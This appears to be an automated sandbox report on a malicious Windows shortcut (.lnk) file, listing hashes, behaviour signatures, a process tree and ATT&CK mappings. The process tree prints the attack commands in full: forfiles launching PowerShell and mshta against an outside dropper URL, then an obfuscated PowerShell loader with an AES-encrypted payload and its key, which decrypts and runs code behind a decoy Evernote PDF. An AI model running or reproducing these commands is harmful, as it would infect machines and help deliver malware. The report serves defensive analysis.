84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30

General

Target

84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Size

148KB
MD5

d39a73de9f109e3dba408e9481998206
SHA1

30651dada81443db0fde9c3a336955d27b6d9024
SHA256

84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30
SHA512

09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61
SSDEEP

24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

4 2688 mshta.exe
7 2688 mshta.exe
8 2400 powershell.exe
Downloads MZ/PE file

flow	pid	process
4	2688	mshta.exe
7	2688	mshta.exe
8	2400	powershell.exe

Drops file in Windows directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2652 powershell.exe
2400 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

2492 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2652 powershell.exe
Token: SeDebugPrivilege 2400 powershell.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

AcroRd32.exe

pid process

2492 AcroRd32.exe
2492 AcroRd32.exe
2492 AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2652	powershell.exe
2400	powershell.exe

pid	process
2492	AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe

pid	process
2492	AcroRd32.exe
2492	AcroRd32.exe
2492	AcroRd32.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.exeforfiles.exepowershell.exemshta.exepowershell.exe

description	pid	process	target process
PID 2224 wrote to memory of 2668	2224	cmd.exe	forfiles.exe
PID 2224 wrote to memory of 2668	2224	cmd.exe	forfiles.exe
PID 2224 wrote to memory of 2668	2224	cmd.exe	forfiles.exe
PID 2668 wrote to memory of 2652	2668	forfiles.exe	powershell.exe
PID 2668 wrote to memory of 2652	2668	forfiles.exe	powershell.exe
PID 2668 wrote to memory of 2652	2668	forfiles.exe	powershell.exe
PID 2652 wrote to memory of 2688	2652	powershell.exe	mshta.exe
PID 2652 wrote to memory of 2688	2652	powershell.exe	mshta.exe
PID 2652 wrote to memory of 2688	2652	powershell.exe	mshta.exe
PID 2688 wrote to memory of 2400	2688	mshta.exe	powershell.exe
PID 2688 wrote to memory of 2400	2688	mshta.exe	powershell.exe
PID 2688 wrote to memory of 2400	2688	mshta.exe	powershell.exe
PID 2400 wrote to memory of 2492	2400	powershell.exe	AcroRd32.exe
PID 2400 wrote to memory of 2492	2400	powershell.exe	AcroRd32.exe
PID 2400 wrote to memory of 2492	2400	powershell.exe	AcroRd32.exe
PID 2400 wrote to memory of 2492	2400	powershell.exe	AcroRd32.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2224

C:\Windows\System32\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"
2⤵
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
. mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
4⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function NDkpzB($PbutE){return -split ($PbutE -replace '..', '0x$& ')};$FgMPQtR = NDkpzB('3D2E22BEE13CCFE8B668DFE3870189AB65FC83A106ED0669AD4641C874CEFC917EC535ADDF89DF1FC0D291409C73E835B9F5E70CF0828A29B1A99FCA6F796F2A42503EAD3E20FB474BFCCBC35604C7DF567229A99309C37991C3C06D087F748ACC4BC05F5B87FDD9577382DC5E78E9AF8F258959DBD417148594A4E69F30F8BA09721A811C9154BF4F46C61B027E5E341F93E46D8A20C8C29F4EC25E5C686A83F3F134C5E02359C71996DDDA3CB61DC08A2EB6BE0D3BB39C00E9CD6C5B8E50425065FA05BE50EB58A186392882ABB24FD4D0628687F1E075817F6E330DC872782EC8EF3270D119F3F1EC86C7C67AB9FD26BF831DFCD080EFE275AD185384E578FB6FF21965BEBABF3D61F1298B71AA9FC44837B82550CF83C1CA66CF07FDD34B3A36310A571FD186CAA02874D83D539F0ED9044B8229A424D9B6082A7ACC921F90904F4DF72C046C6FD1C5F33D9111995AAD7C1C1DD1C2AB1663495AD4FA4A076957D6C02EA68AC2E44CCE5221002CB17CB5CE00989546834D261F7C9FEAF275945B6288E36BE0499F62C619DD95E5D74BCE21A67C9B3D7086F8A2BC180BC93D234878A2B0DE6149370967764D9A43A5B369191F8CA07CDA7F4C04EEA417515BBE36A47DB3F155508C8C012037E01E725505EA2CEF9DC3452A26D6CCCEEB8F53AB4E584DB03063509EDC34BD1631BC0D85131CD09FF34CB6F59C256EE3A3F103404A0F88BEE10B6013EBA9B9A71B168C53B1500E3EE8F5E3D826118E292F0BD55FDD0C5D4926161CC7FE9FB046F7A7A4BE387BF2C9A4CD81588044BB525721950179CD20BC45EDCF86DACC2D05515E4A58A7D4607A73C70D16BB5DF70BD51F26556B2B75F712CF6B33D805188BE16B94E6CF59787C2CAD2624B8DE1F1FD6555ADCD6B087438FE541F4E496F6A1A54088B41117481113DF53DEE84CA74EE438A319B822416D96A624AB4ADA351565AB1AB7910CB458083883D052E81D58BBD45FA51B2A392F60088ACC43D43965E09E3999B124A4D99742762C29FEE7420F1FEBEAA69BE53723E7C83A1A0A9AB74BD3474822C6D09A38219121F97EB315CC6A97AFFD96443F43BCCB405282E5D5F8C2E1607082372440DB310E54573087CA2C07CAD48324AAA6D911A31EBE54BC246CC77D449E0209925602A237BE857173875FF7CBDF566A584855FA36E7BA974C49E4AC6BA71F637954D6EC82596875886BD35B62A9C41EA16912E81F4625EFFEE2F5FCD66832EF3C439A748C8E6AA5C50B2992CA202119B2EBDB95ECE163FC8FF7B0501C611AFDCD510A004DE882C79B433EDD9B890926856A227E5785BA964677F025837F0C62EF77D4C9D609518E415D6DDC2396A5839D383F6432318DE07919F442E2D5D455313D4A5E6414B3670D6DA8A746844B6475984E7DC5722645FAE5C2734D64606B25DD735043ABF19ACE1D00CF1455D8DCB263FE49FF6DAF30B1D278A2B024AAFA5CD490FA75A3500718CB6C2D733C645F1D96145E4F47C3B9FFAB0A80D4806F9597AB6C16648E27BAE0DBAFEBCA1B9FC9CB65F38A195E4BF3C914D7EB77DF41FEBED9252B7AA6D055220D9B1BE5316F0934D2ACF837572E54605BB44920BC30963D120BE37D1424FC57F0BC5A94530924D42DB1D03E2DF2E25F9425495C81589DAB9FE1139AE45431DCCDE27404986F8ED2458E7515A420D2F40D110D146A7F3E0566F550A052B46A6AC139EBE3CC41082CAE82EC5846FEC3099D033661D49805ED48FE4F019ECC22D5684A78CE7960DA71ED832792147A535401F1498FAE1C2C4FAECFB4DA3EBF98E01C1B81D841AA94083C26C2E7AC676E83180756C3EC3BA39F08A527D5CA7063EA91228B210D40DA1428F93986B13C10BF132D27C85801CC49F8598B105227DB80FF777FB78B8D6537584E244FF98133C299B3DCD20BE4D4BEA88D068CDBD84F54F0E419FF9F730F7FC17BB140848191A0AE77DC3182584C1F0BBA1EFE230BA6F9BD64622D0EBB1B60D55C6DD5141BD03DC8E385CF9AD75D8CE161AD6433E790579D4C316320D3BF9B609ED9BC810E661092B5D2F824ECD168E1A288B1EC23A230DFEBD019DC175FE02FB070676A7482EAC99F984A1B33F24A05624DD8E8FE3B261186010881F43CBA3AF8581D0B62D6FD371276A0A6AC713BBF10E63835C647C6808C475CFDA4B5362CFB4709875D7C86AD7B698CE71A069C32FE65523E8D3E8C40DE1149F66CD1B651698F41D98DB91312BD04A1E012D728C2FB120EB74CFF9F93D064E541C8953EE17AAD25F9A2CE3116796F26552CF5C7F08B1B73411CB6622FBFC3A56EA8D19B6513611D36C25F7AC9428174BCC5D619DB2C87759D6E0C291582A50C887CD0E72F242760BC721B1271E4732B1FBEF23833AA9EE322D775365EDD7D0C2AF9E01C3492F003338D21E90287');$UcouF = [System.Security.Cryptography.Aes]::Create();$UcouF.Key = NDkpzB('415450574E64494F4F6C5A7742707268');$UcouF.IV = New-Object byte[] 16;$seVZtfGD = $UcouF.CreateDecryptor();$mamDBHAHL = $seVZtfGD.TransformFinalBlock($FgMPQtR, 0, $FgMPQtR.Length);$bZUJiekdW = [System.Text.Encoding]::Utf8.GetString($mamDBHAHL);$seVZtfGD.Dispose();& $bZUJiekdW.Substring(0,3) $bZUJiekdW.Substring(3)
5⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2400

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf"
6⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2492

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
Filesize
3KB

MD5
408e13d3f9eb2f9cdf51c7818b172712

SHA1
248d573ec1887dad21a337759a24abd3234a447f

SHA256
f79ef94e981079f9e1f4cdd8305404564174bc120e45bea9e9fad643137b6411

SHA512
5f436bc3ceb5faf6acd6fb718479efff358e254381f31e6808b7a3d6f67643ffb17e6bc66423ad9dda972a410c5c9d27436fe7798573a8303e1f721fbfde864e

Download Submit
C:\Users\Admin\AppData\Roaming\Evernote-Supplemental-Terms.pdf
Filesize
70KB

MD5
508c98b92beb1aac53108149273aeb18

SHA1
434698e85e6bf7e1989212ce99d3b3e0a6b5171d

SHA256
861b8186ac5e7157ff17abe83c9aff3856113d43adf3bae520f93d75940c9c46

SHA512
08dfe9c8809bbf0ff03add0025a29e23834b9f37f926c1b9646e5cf217e690cd77872df90a8b2a71f18beb9334a547aa0eb2d26c1fcc423f95e1c19ee42d932f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FKSCWYTRHOE7CPNV6V8W.temp
Filesize
7KB

MD5
81256cae7a194d4011afd5eeb02fe918

SHA1
ac0de0ab1149d05446268d9fa93f6bdcf03c5546

SHA256
dbe07ee03f5b24db883f46be83d9432b491feb6926fecc8a528255300ec0ed1b

SHA512
4585c9450a27147a109af8aa570e50260fdd574693103a112c6879d3e808650298f0b5758fb7e700d56c03fa75bdee71a61f66aa71eb4f8bb36a8b4516e5d8de

Download Submit
memory/2400-68-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/2400-69-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2652-40-0x000007FEF5A5E000-0x000007FEF5A5F000-memory.dmp

Filesize
4KB

Download
memory/2652-41-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2652-42-0x00000000026F0000-0x00000000026F8000-memory.dmp

Filesize
32KB

Download
memory/2652-43-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-44-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-45-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-46-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing